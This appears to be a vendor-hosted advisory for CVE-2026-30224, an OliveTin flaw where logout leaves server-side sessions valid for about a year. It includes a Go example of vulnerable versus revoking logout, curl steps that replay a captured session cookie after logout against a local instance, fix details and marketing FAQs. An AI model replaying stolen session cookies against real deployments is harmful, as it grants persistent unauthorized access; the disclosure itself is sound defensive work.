Summary
OliveTin does not revoke server-side sessions when a user logs out. The logout handler clears the browser cookie, but the corresponding session stays valid in server storage until it expires (default ≈ 1 year).
An attacker holding a previously stolen or captured session cookie can therefore keep authenticating after the victim has logged out: a post-logout authentication bypass.
This is a session management flaw that violates the expected semantics of logout (the session should be unusable the moment the user ends it).
Details
During logout:
// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())
However, the server still accepts the session, because the lookup only checks that the SID is present in the store:
// Session lookup: the SID is still present after logout, so the old cookie resolves
session := sessionStorage.Providers[provider].Sessions[sid]
...
return session
The SID is never deleted from sessionStorage during logout, so the old cookie remains accepted until the session expires (~1 year by default).
Files: api.go, sessions.go, local.go
Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47
Behavior
- Login → receive SID cookie
- Logout → cookie cleared client-side
- Replay old SID manually → still authenticated
Expected:
- Logout invalidates session immediately
Actual:
- Old SID remains usable until expiry
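To make the expected and actual behaviour concrete, the following is an added Go example, not OliveTin's code. It uses a hypothetical in-memory session store and two logout handlers: one that only expires the browser cookie, as described above, and one that also deletes the SID server-side. The cookie name and endpoint paths follow the reproduction steps on this page; the store, the one-year TTL constant and all function names are assumptions. The test harness drives both handlers in-process with net/http/httptest, so nothing listens on a port.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
	"time"
)

// cookieName follows the cookie used in the reproduction steps above.
const cookieName = "olivetin-sid-local"

// sessionTTL stands in for the advisory's "~1 year" default (assumed value).
const sessionTTL = 365 * 24 * time.Hour

type session struct {
	user    string
	expires time.Time
}

// sessionStore is a hypothetical in-memory server-side session table (SID -> session).
type sessionStore struct {
	mu       sync.Mutex
	sessions map[string]session
}

func newStore() *sessionStore { return &sessionStore{sessions: map[string]session{}} }

// create issues a fresh random SID for user and records it server-side.
func (s *sessionStore) create(user string) string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	sid := hex.EncodeToString(b)
	s.mu.Lock()
	defer s.mu.Unlock()
	s.sessions[sid] = session{user: user, expires: time.Now().Add(sessionTTL)}
	return sid
}

// lookup resolves a SID. Only expiry ever rejects it: unless logout calls
// revoke, a captured SID keeps working for the whole TTL.
func (s *sessionStore) lookup(sid string) (string, bool) {
	s.mu.Lock()
	defer s.mu.Unlock()
	sess, ok := s.sessions[sid]
	if !ok || time.Now().After(sess.expires) {
		return "", false
	}
	return sess.user, true
}

// revoke removes the SID server-side; this is the step the vulnerable logout lacks.
func (s *sessionStore) revoke(sid string) {
	s.mu.Lock()
	defer s.mu.Unlock()
	delete(s.sessions, sid)
}

// userFromRequest authenticates a request by its SID cookie (a WhoAmI-style check).
func userFromRequest(store *sessionStore, r *http.Request) (string, bool) {
	c, err := r.Cookie(cookieName)
	if err != nil {
		return "", false
	}
	return store.lookup(c.Value)
}

// logoutHandler builds a logout handler. revoke=false reproduces the flaw: it
// only expires the browser cookie. revoke=true also deletes the SID from the
// store, which is what logout must do.
func logoutHandler(store *sessionStore, revoke bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if c, err := r.Cookie(cookieName); err == nil && revoke {
			store.revoke(c.Value)
		}
		http.SetCookie(w, &http.Cookie{
			Name: cookieName, Value: "", Path: "/", MaxAge: -1,
			HttpOnly: true, SameSite: http.SameSiteStrictMode,
		})
	}
}

// replayAfterLogout logs in, logs out through the chosen handler, then replays
// the original SID as a stolen cookie would. True means the replay still authenticates.
func replayAfterLogout(revokeOnLogout bool) bool {
	store := newStore()
	sid := store.create("low")
	logoutReq := httptest.NewRequest(http.MethodPost, "/api/Logout", nil)
	logoutReq.AddCookie(&http.Cookie{Name: cookieName, Value: sid})
	logoutHandler(store, revokeOnLogout)(httptest.NewRecorder(), logoutReq)
	replay := httptest.NewRequest(http.MethodPost, "/api/WhoAmI", nil)
	replay.AddCookie(&http.Cookie{Name: cookieName, Value: sid})
	_, ok := userFromRequest(store, replay)
	return ok
}

func main() {
	fmt.Println("cookie-only logout, replay authenticated:", replayAfterLogout(false)) // true
	fmt.Println("revoking logout, replay authenticated:", replayAfterLogout(true))     // false
}
```

The cookie-only handler is the "Actual" behaviour above (the replay still resolves to user low); the revoking handler is the "Expected" one. Expiring the cookie client-side is cosmetic: the server's store is the only thing that decides whether a SID authenticates, so revocation has to happen there.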
PoC
Minimal config (password is the argon2id hash of the cleartext used in the login request below):
listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true
authLocalUsers:
  enabled: true
  users:
    - username: low
      usergroup: users
      password: "$argon2id$..."
actions:
  - title: Dummy
    id: dummy
    shell: "echo dummy"
Reproduction
Login and capture the SID ("lowpass" must be the cleartext matching the argon2id hash in the config):
LOGIN=$(curl -si -X POST http://localhost:16642/api/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')
# Extract the cookie value from the Set-Cookie header; strip CRs so the SID is clean
SID=$(printf '%s\n' "$LOGIN" | tr -d '\r' | awk -F'[=;]' '/olivetin-sid-local=/{print $2; exit}')
Works before logout:
curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"
Logout:
curl -X POST http://localhost:16642/api/Logout \
  -H "Cookie: olivetin-sid-local=$SID"
Replay old cookie:
curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"
Result
User is still authenticated after logout: the replayed SID resolves to user low exactly as before the Logout call. On a fixed build (0.0.0-20260304233115-d6a0abc3755d15 or later) the same replay should no longer authenticate as low.
Impact
Type: Session Management Flaw
- Logout Bypass
- Session Replay
Risk:
- Stolen cookies remain valid
- Persistent unauthorized access
- Users falsely believe logout ended the session
Attack scenarios:
- Shared computers
- XSS/session theft
- Proxy logs
- Malware/browser compromise
CVE-2026-30224 has a CVSS score of 5.4 (Medium). The vector is network-reachable, requires low privileges and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260304233115-d6a0abc3755d15); upgrading removes the vulnerable code path.
Affected versions: github.com/OliveTin/OliveTin (go) < 0.0.0-20260304233115-d6a0abc3755d15
Security releases: 0.0.0-20260304233115-d6a0abc3755d15
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-30224? CVE-2026-30224 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260304233115-d6a0abc3755d15. It is fixed in 0.0.0-20260304233115-d6a0abc3755d15.
- How severe is CVE-2026-30224? CVE-2026-30224 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-30224? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260304233115-d6a0abc3755d15 are affected.
- Is there a fix for CVE-2026-30224? Yes. CVE-2026-30224 is fixed in 0.0.0-20260304233115-d6a0abc3755d15. Upgrade to this version or later.
- Is CVE-2026-30224 exploitable, and should I be worried? Whether CVE-2026-30224 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-30224 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-30224? Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260304233115-d6a0abc3755d15 or later.